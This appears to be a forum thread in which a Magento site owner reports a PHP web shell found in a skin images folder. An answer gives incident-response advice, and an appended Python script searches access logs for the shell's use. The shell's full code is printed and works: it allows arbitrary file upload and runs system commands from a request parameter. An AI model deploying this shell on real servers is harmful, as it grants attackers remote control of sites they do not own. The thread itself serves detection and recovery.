My Magento installation seems to have had a security breach.

In /skin/install/default/default/images/ a file called index.php has appeared.

It contains the following code:

    <?php
    if(@$_REQUEST["id"]== 'yes')
    {
        $files = @$_FILES["files"];
        if($files["name"] != ''){
            $fullpath = $_REQUEST["path"].$files["name"];
            if(move_uploaded_file($files['tmp_name'],$fullpath)){
                echo "<h1><a href='$fullpath'>shell</a></h1>";
            }
        }
        exit('<form method=POST enctype="multipart/form-data" action=""><input type=text name=path><input type="file" name="files"><input type=submit value="Up"></form>');
    }
    if(@$_REQUEST["id"]== 'no')
    {
        system($_GET["cmd"]);
    }
    ?>

Alison

1 Answer

First and foremost, change all passwords immediately. Download any log files from your host (web server, FTP, etc.) to help pinpoint what has been compromised. Contact your hosting provider for any insight and help they may offer.

The safest option, however, is to determine when the site was compromised and restore from a backup beforehand. It can be more difficult and time-consuming than data loss to prevent any installed back doors.

The script appears to be allowing for the execution of system commands via parameters and the ability to download/upload files to the system.

Good luck.

B00MER
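To act on the answer's advice about using log files to determine when the site was compromised, here is an added example (not part of the original question or answer) that scans a web server access log for requests to PHP files inside directories that should serve only static assets. The log lines are constructed, and the combined log format and the choice of `/skin/` and `/media/` as static-only trees are assumptions.

```python
import re
from datetime import datetime
from urllib.parse import urlsplit, parse_qs

# Constructed sample lines in Apache/nginx "combined" format (not real traffic).
SAMPLE_LOG = """\
198.51.100.7 - - [03/Mar/2015:02:14:09 +0000] "POST /skin/install/default/default/images/index.php?id=yes HTTP/1.1" 200 187 "-" "Mozilla/5.0"
203.0.113.5 - - [03/Mar/2015:02:15:40 +0000] "GET /skin/frontend/default/default/images/logo.gif HTTP/1.1" 200 3120 "-" "Mozilla/5.0"
198.51.100.7 - - [03/Mar/2015:02:16:31 +0000] "GET /skin/install/default/default/images/index.php?id=no&cmd=id HTTP/1.1" 200 54 "-" "Mozilla/5.0"
203.0.113.5 - - [03/Mar/2015:02:17:02 +0000] "GET /index.php/checkout/cart/ HTTP/1.1" 200 9001 "-" "Mozilla/5.0"
"""

LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) ')
# Assumption: these trees hold only static assets, so any .php request is suspect.
STATIC_PREFIXES = ("/skin/", "/media/")

def suspicious_hits(log_text):
    """Return requests for .php files under static-asset directories, oldest first."""
    hits = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # skip lines that are not in the expected format
        ip, stamp, method, target, status = m.groups()
        url = urlsplit(target)
        if not (url.path.startswith(STATIC_PREFIXES) and url.path.lower().endswith(".php")):
            continue
        params = parse_qs(url.query, keep_blank_values=True)
        hits.append({
            "when": datetime.strptime(stamp, "%d/%b/%Y:%H:%M:%S %z"),
            "ip": ip, "method": method, "path": url.path, "status": int(status),
            "has_cmd": "cmd" in params,  # command parameter read by the posted script
            "upload": method == "POST" and params.get("id") == ["yes"],  # its upload branch
        })
    return sorted(hits, key=lambda h: h["when"])

def earliest_hit(log_text):
    """Timestamp of the first suspicious request, or None if there is none."""
    hits = suspicious_hits(log_text)
    return hits[0]["when"] if hits else None

if __name__ == "__main__":
    for h in suspicious_hits(SAMPLE_LOG):
        print(h["when"].isoformat(), h["ip"], h["method"], h["path"], h["status"])
    print("first suspicious request:", earliest_hit(SAMPLE_LOG))
```

The earliest request only shows when the file was first used; the file was written at or before that time, so the backup to restore should predate it and the logs around that point are where to look for how it arrived.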